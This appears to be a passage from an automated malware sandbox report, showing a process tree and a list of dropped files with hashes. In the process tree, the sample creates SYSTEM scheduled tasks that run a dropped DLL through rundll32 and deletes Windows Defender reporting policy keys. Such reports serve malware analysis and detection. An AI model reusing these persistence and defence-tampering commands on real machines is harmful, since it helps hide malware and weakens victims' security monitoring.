C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "TyQOTUQyxpQhGBNnFCS2" /F /xml "C:\Program Files (x86)\IjchgTxaUtSoC\ntyNLWt.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:856
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "oYgNoNeTxNTUFfDli" /SC once /ST 00:12:07 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\qMfgxxkvaFNxVGCk\frFtbWxY\YmfcWjl.dll\",#1 /yNsite_idmkM 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2336
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "oYgNoNeTxNTUFfDli"3⤵PID:1700
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:1144
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:2432
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:2644
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:2632
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ULPYamQDIjWIhTUbi"3⤵PID:2692
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\qMfgxxkvaFNxVGCk\frFtbWxY\YmfcWjl.dll",#1 /yNsite_idmkM 5254032⤵PID:1960
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\qMfgxxkvaFNxVGCk\frFtbWxY\YmfcWjl.dll",#1 /yNsite_idmkM 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2036 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "oYgNoNeTxNTUFfDli"4⤵PID:2412
-
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:960
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2040
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2204
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD55d2f7a7f6e18e0cffc4264dd4661907a
SHA10da3393f583f19c884c290cc033d793faeefa42c
SHA256c680eb03cf3e44737c381977ffa3d785db00e6e8df122892bc42a248791caec5
SHA512670c95ea4e89eb9133d54971faf27d7e642b0486c002e31411d68a7d534d21891a786686a30157d8c7a4b12155eaca2b4c77e2a4dd2db3c3360e0470ae5fc516
-
Filesize
2KB
MD5c5d9bc8a1d05ce9c86911ae02017a9a2
SHA14f532cb31cba96234992645beeed1e5f92cb2822
SHA256d4c436e27101a1657329ca7451e393d41b05579778b84126acba4d46e90d6905
SHA512ae5dcd3d6c6d2509ea3b3667e2ba3bdaf6c62512627d549cedf654015a21fb9035a2f368411b885fd0ba3ab0c8a4a8a6f51b5dd9aa7fdd47f9fed5fc931479ed
-
Filesize
2KB
MD5fefdc6e18a94101e8c58eba4509347ec
SHA14d000ded42e3bee14da42dd807a13bb418e0925a
SHA2566cbd55d6e8bf0f34c702481ccdaee38411d9655e63017ff45bd7e9fb2c8b2cb7
SHA5123ad1cc64e3a2f3bbb4151fa71ee10a5c9ddb14c003a85c53a4829b9cd9b0ff8de4956445827541e177b2d7cef2180a269b6dc32378f8bab7817b25901ef32e01
-
Filesize
2KB
MD5777c4aca19ce50cbcf58c501f87c1df9
SHA1d28da58598689ab3752b027aeb1448d564f4b386
SHA2568b2fbc695e4820e79fc2d5cfcdd94696e51f54cf04ebe515fadc0f9a14c808fa
SHA512be9ab69017c76de39c01745a169b9eab14bb565dbc069bef4574c9f74fc231753d9563f2abc44722d90bb53ff3c641e7beac9b70be818ad33f62ab2dc0df590c
-
Filesize
1.2MB
MD5f7ad124586b73acb7926223e4f3e8773
SHA127aafb50bde409593b86eac05ab2ee1e91d44045
SHA256be5cbc4c483bb53184d2670045e114d4f9f0d84752c943e72d3473f69295ca3e
SHA512e194f85851d1e9f5f44484e4003f0e21e70ec3d8dcea2aadfa43669843962f6157f28a8edb4e742c5cc6ef174469652446b94d949777e796549ec1c104060c7b
-
Filesize
2KB
MD5d23874bf0127135bcf373533c525f680
SHA1d9ce00c7a97badc1f7af01d39a494830552f1af7
SHA256672dfacd1fd6db51ba0dc8a8297187ee9caff5b17e256a3327f21af187dc6b53
SHA51258030d5e0648e12a57e84539c4b1e1dba96a41bfc8c4281f17bb08f48cb4827b8ac0307b6076572b6109178d85f99332b11e25bab012b7982bd70ef0846c32c6
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
9KB
MD5512ddbad411b971d23665c7a92892930
SHA10eb6070a1721a03d67298083ce71a7998b6f4b69
SHA25672c81648fbab740ce3d2824a041d24d868c035e899928a0f73af06b2d60cabc7
SHA5120baf947ed2af549089e94febf932c1080aed37fe475cdd0cd17bd02f7b196a4e0e591d43c0ce17de2cfa6bee618ba03b3dc966ccec4d1ac2649a6803e1b83206
-
Filesize
27KB
MD57fb8a80147639467be2d8fa56d5decd5
SHA1af75c30d12336917d7df3aa694c04a9e5d815f6a
SHA256088ac6f3630f02a54a9c323ac80132f8ff8ff29ce12c753d82ed3936b14da614
SHA512c6d8438cb2670fcb58094219d28bdbed84e24756035710b1914fb39444477529dc6bb393de1b8ec3f92780ca514376f1f41c9cbe6526cef041c43029e3f0f69f
-
Filesize
6.1MB
MD558b3e4f87f1aa519b666596e7cf0a592
SHA1a861d11cb4552bdf993c3a69f7fca5610140fe14
SHA2560b06b2799c26a15818bae6173da36fd86f122639a3f66a18dadbaefc7c845a5c
SHA5127ad1d36e37e31e7f240e36bf9ac9e76c1bc2646aeb7f610cf94d34fbf96e05bec3bcebb3bcdaf25a29d289cf83b71cb75c759117a41e88e862377537360216f1
-
Filesize
6.1MB
MD558b3e4f87f1aa519b666596e7cf0a592
SHA1a861d11cb4552bdf993c3a69f7fca5610140fe14
SHA2560b06b2799c26a15818bae6173da36fd86f122639a3f66a18dadbaefc7c845a5c
SHA5127ad1d36e37e31e7f240e36bf9ac9e76c1bc2646aeb7f610cf94d34fbf96e05bec3bcebb3bcdaf25a29d289cf83b71cb75c759117a41e88e862377537360216f1
-
Filesize
7.0MB
MD5a52dabfd55a6a04633ac83693b0a4177
SHA1184c0c38f9ae941f2adbf47ef1f3be362926ad22
SHA256bd637071d3d05a774893ec7643e9c4ebcd7c0628bdee233f1c2a6f0aabc7bcfe
SHA5125de6514dbc7f8bd58a902d6599c5f2f2650fe7fb1a0ce444f718d70abc639c0f9c9883ea8c79aa6bfe48f83c9dfe5d1c50fc130b485d212c6c7ce9b2287e3b12
-
Filesize
7.0MB
MD5a52dabfd55a6a04633ac83693b0a4177
SHA1184c0c38f9ae941f2adbf47ef1f3be362926ad22
SHA256bd637071d3d05a774893ec7643e9c4ebcd7c0628bdee233f1c2a6f0aabc7bcfe
SHA5125de6514dbc7f8bd58a902d6599c5f2f2650fe7fb1a0ce444f718d70abc639c0f9c9883ea8c79aa6bfe48f83c9dfe5d1c50fc130b485d212c6c7ce9b2287e3b12
-
Filesize
7.0MB
MD5a52dabfd55a6a04633ac83693b0a4177
SHA1184c0c38f9ae941f2adbf47ef1f3be362926ad22
SHA256bd637071d3d05a774893ec7643e9c4ebcd7c0628bdee233f1c2a6f0aabc7bcfe
SHA5125de6514dbc7f8bd58a902d6599c5f2f2650fe7fb1a0ce444f718d70abc639c0f9c9883ea8c79aa6bfe48f83c9dfe5d1c50fc130b485d212c6c7ce9b2287e3b12
-
Filesize
7.0MB
MD5a52dabfd55a6a04633ac83693b0a4177
SHA1184c0c38f9ae941f2adbf47ef1f3be362926ad22
SHA256bd637071d3d05a774893ec7643e9c4ebcd7c0628bdee233f1c2a6f0aabc7bcfe
SHA5125de6514dbc7f8bd58a902d6599c5f2f2650fe7fb1a0ce444f718d70abc639c0f9c9883ea8c79aa6bfe48f83c9dfe5d1c50fc130b485d212c6c7ce9b2287e3b12
-
Filesize
7.0MB
MD5a52dabfd55a6a04633ac83693b0a4177
SHA1184c0c38f9ae941f2adbf47ef1f3be362926ad22
SHA256bd637071d3d05a774893ec7643e9c4ebcd7c0628bdee233f1c2a6f0aabc7bcfe
SHA5125de6514dbc7f8bd58a902d6599c5f2f2650fe7fb1a0ce444f718d70abc639c0f9c9883ea8c79aa6bfe48f83c9dfe5d1c50fc130b485d212c6c7ce9b2287e3b12
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5bf51b5de46a8a7c83032d00de974a4cf
SHA14c500d997f44714d4a55efba197040c4c0eaf09f
SHA2563b2b0ab2d74fe4666ad5fab2a9f1594b6b02ef5011bc917c4454b4f8effc5e39
SHA512780138e7bef7337b47680f5ebe826079f261ba3cff208d3feb884d275416a53d2e7b76a4dbadc3e023b83e59f9fa028446918051badf000c3a2855b062972238
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5283bec6edf869cc11ad2eda2970ed67e
SHA16767723b41100e2b631141b9d1a0e8a5e61864ee
SHA2565859dbfff49e535d32cb8258f495e43e758a8735badf79eb95282c8437d00caf
SHA512069498456f68c9b3b2a4c223c1e89ab6830f4821f6806a4db971f3af0902b69d9b3c09e019afd9ad7011c9d04bd467c1fd46056c41ed4f9f1a70777540768559
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5b9db8d0440832df0b61da9f97e7eccb4
SHA16bd5231735c668f4241785be1e9b8a8beae74737
SHA25690cb0a2c4815064d2c3175aa7260bba7046e6632321f30e2fa43fd94f2bf5c85
SHA5123e825e05ce9820e7d71e8b6358f4d265a14e4e55d506ba3556405d14f1eeea3cdb23abda8fe0ef4fefc68d711608c459ea5cea81cd44e55e73bea804151d113c
-
Filesize
7KB
MD507357b545548f67101937634bc1a1410
SHA14669a1587dd97c96cc7ca64d5f00f16b85e09aa7
SHA2561cfff8899a3884e930ba2c6cfa872af7d90499bc1b519a67ab2e69f6d2da1f5c
SHA512e9a85cfdd27358f4149446cc830d96685e396624555f4b957629a35851ffc2db5ea1a292d6e593407ec25cdb854ef79daed12994f74fbdb21e440f0cd72e30fb
-
Filesize
6.1MB
MD5d05c5e84c729a0c666eecfe14c936e36
SHA1d34b7a17e1f20d68c2f50bfa7d3fcb9567272a0a
SHA2566e915747e036eae54ec8d6866c3238c881c66bce6021bd35a21d9a3ae207f33d
SHA512f2dd030f9359efde204f04777a0e066ea5dc0de575d1423fb6fb80a83edbbfae436369039dfcef2045758469e6674fdcaa761787828f5e81b070868b884eee4d
-
Filesize
9KB
MD58ca1b6bcd9b2403cd7f6d0e990a62aa5
SHA1472b2bdd16b26e6e70f28bdc2d18fca828725dee
SHA2560544629aa4ef70fd99f7918e02a4be5c739bfe9061a8b685da28006830eabd9c
SHA512a387791c72ac3bebf4d8e3bf33744e9bb2d1ef51358dd48988b67f4938b5f04fdcc4e3137cf6c84ca8a8b88238f2bdec72418e42ca7a03358ee9a6ce4dfad0bd
-
Filesize
7.0MB
MD5a52dabfd55a6a04633ac83693b0a4177
SHA1184c0c38f9ae941f2adbf47ef1f3be362926ad22
SHA256bd637071d3d05a774893ec7643e9c4ebcd7c0628bdee233f1c2a6f0aabc7bcfe
SHA5125de6514dbc7f8bd58a902d6599c5f2f2650fe7fb1a0ce444f718d70abc639c0f9c9883ea8c79aa6bfe48f83c9dfe5d1c50fc130b485d212c6c7ce9b2287e3b12
-
Filesize
7.0MB
MD5a52dabfd55a6a04633ac83693b0a4177
SHA1184c0c38f9ae941f2adbf47ef1f3be362926ad22
SHA256bd637071d3d05a774893ec7643e9c4ebcd7c0628bdee233f1c2a6f0aabc7bcfe
SHA5125de6514dbc7f8bd58a902d6599c5f2f2650fe7fb1a0ce444f718d70abc639c0f9c9883ea8c79aa6bfe48f83c9dfe5d1c50fc130b485d212c6c7ce9b2287e3b12
-
Filesize
6KB
MD5ce1b129744581d48e201712d065f00c5
SHA14ad033efd7791cfe6b7e9793c7bb016d6e9251ff
SHA2567c4a6de31da64a48463825d6ff6b66bd2579406219e46ad4da976e7186624260
SHA512f29bbe407c9896cf64dd3b28ad795c9fb5634a538b977d2fbfc16d4f7bd1cf372b3f46cebd77a3f56856512286299443c4cd18604e0bfe1d6bb166fc88ae95b6
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
Filesize
6.1MB
MD558b3e4f87f1aa519b666596e7cf0a592
SHA1a861d11cb4552bdf993c3a69f7fca5610140fe14
SHA2560b06b2799c26a15818bae6173da36fd86f122639a3f66a18dadbaefc7c845a5c
SHA5127ad1d36e37e31e7f240e36bf9ac9e76c1bc2646aeb7f610cf94d34fbf96e05bec3bcebb3bcdaf25a29d289cf83b71cb75c759117a41e88e862377537360216f1
-
Filesize
6.1MB
MD558b3e4f87f1aa519b666596e7cf0a592
SHA1a861d11cb4552bdf993c3a69f7fca5610140fe14
SHA2560b06b2799c26a15818bae6173da36fd86f122639a3f66a18dadbaefc7c845a5c
SHA5127ad1d36e37e31e7f240e36bf9ac9e76c1bc2646aeb7f610cf94d34fbf96e05bec3bcebb3bcdaf25a29d289cf83b71cb75c759117a41e88e862377537360216f1
-
Filesize
6.1MB
MD558b3e4f87f1aa519b666596e7cf0a592
SHA1a861d11cb4552bdf993c3a69f7fca5610140fe14
SHA2560b06b2799c26a15818bae6173da36fd86f122639a3f66a18dadbaefc7c845a5c
SHA5127ad1d36e37e31e7f240e36bf9ac9e76c1bc2646aeb7f610cf94d34fbf96e05bec3bcebb3bcdaf25a29d289cf83b71cb75c759117a41e88e862377537360216f1
-
Filesize
6.1MB
MD558b3e4f87f1aa519b666596e7cf0a592
SHA1a861d11cb4552bdf993c3a69f7fca5610140fe14
SHA2560b06b2799c26a15818bae6173da36fd86f122639a3f66a18dadbaefc7c845a5c
SHA5127ad1d36e37e31e7f240e36bf9ac9e76c1bc2646aeb7f610cf94d34fbf96e05bec3bcebb3bcdaf25a29d289cf83b71cb75c759117a41e88e862377537360216f1
-
Filesize
7.0MB
MD5a52dabfd55a6a04633ac83693b0a4177
SHA1184c0c38f9ae941f2adbf47ef1f3be362926ad22
SHA256bd637071d3d05a774893ec7643e9c4ebcd7c0628bdee233f1c2a6f0aabc7bcfe
SHA5125de6514dbc7f8bd58a902d6599c5f2f2650fe7fb1a0ce444f718d70abc639c0f9c9883ea8c79aa6bfe48f83c9dfe5d1c50fc130b485d212c6c7ce9b2287e3b12
-
Filesize
7.0MB
MD5a52dabfd55a6a04633ac83693b0a4177
SHA1184c0c38f9ae941f2adbf47ef1f3be362926ad22
SHA256bd637071d3d05a774893ec7643e9c4ebcd7c0628bdee233f1c2a6f0aabc7bcfe
SHA5125de6514dbc7f8bd58a902d6599c5f2f2650fe7fb1a0ce444f718d70abc639c0f9c9883ea8c79aa6bfe48f83c9dfe5d1c50fc130b485d212c6c7ce9b2287e3b12
-
Filesize
7.0MB
MD5a52dabfd55a6a04633ac83693b0a4177
SHA1184c0c38f9ae941f2adbf47ef1f3be362926ad22
SHA256bd637071d3d05a774893ec7643e9c4ebcd7c0628bdee233f1c2a6f0aabc7bcfe
SHA5125de6514dbc7f8bd58a902d6599c5f2f2650fe7fb1a0ce444f718d70abc639c0f9c9883ea8c79aa6bfe48f83c9dfe5d1c50fc130b485d212c6c7ce9b2287e3b12
-
Filesize
7.0MB
MD5a52dabfd55a6a04633ac83693b0a4177
SHA1184c0c38f9ae941f2adbf47ef1f3be362926ad22
SHA256bd637071d3d05a774893ec7643e9c4ebcd7c0628bdee233f1c2a6f0aabc7bcfe
SHA5125de6514dbc7f8bd58a902d6599c5f2f2650fe7fb1a0ce444f718d70abc639c0f9c9883ea8c79aa6bfe48f83c9dfe5d1c50fc130b485d212c6c7ce9b2287e3b12
-
Filesize
6.1MB
MD5d05c5e84c729a0c666eecfe14c936e36
SHA1d34b7a17e1f20d68c2f50bfa7d3fcb9567272a0a
SHA2566e915747e036eae54ec8d6866c3238c881c66bce6021bd35a21d9a3ae207f33d
SHA512f2dd030f9359efde204f04777a0e066ea5dc0de575d1423fb6fb80a83edbbfae436369039dfcef2045758469e6674fdcaa761787828f5e81b070868b884eee4d
-
Filesize
6.1MB
MD5d05c5e84c729a0c666eecfe14c936e36
SHA1d34b7a17e1f20d68c2f50bfa7d3fcb9567272a0a
SHA2566e915747e036eae54ec8d6866c3238c881c66bce6021bd35a21d9a3ae207f33d
SHA512f2dd030f9359efde204f04777a0e066ea5dc0de575d1423fb6fb80a83edbbfae436369039dfcef2045758469e6674fdcaa761787828f5e81b070868b884eee4d
-
Filesize
6.1MB
MD5d05c5e84c729a0c666eecfe14c936e36
SHA1d34b7a17e1f20d68c2f50bfa7d3fcb9567272a0a
SHA2566e915747e036eae54ec8d6866c3238c881c66bce6021bd35a21d9a3ae207f33d
SHA512f2dd030f9359efde204f04777a0e066ea5dc0de575d1423fb6fb80a83edbbfae436369039dfcef2045758469e6674fdcaa761787828f5e81b070868b884eee4d
-
Filesize
6.1MB
MD5d05c5e84c729a0c666eecfe14c936e36
SHA1d34b7a17e1f20d68c2f50bfa7d3fcb9567272a0a
SHA2566e915747e036eae54ec8d6866c3238c881c66bce6021bd35a21d9a3ae207f33d
SHA512f2dd030f9359efde204f04777a0e066ea5dc0de575d1423fb6fb80a83edbbfae436369039dfcef2045758469e6674fdcaa761787828f5e81b070868b884eee4d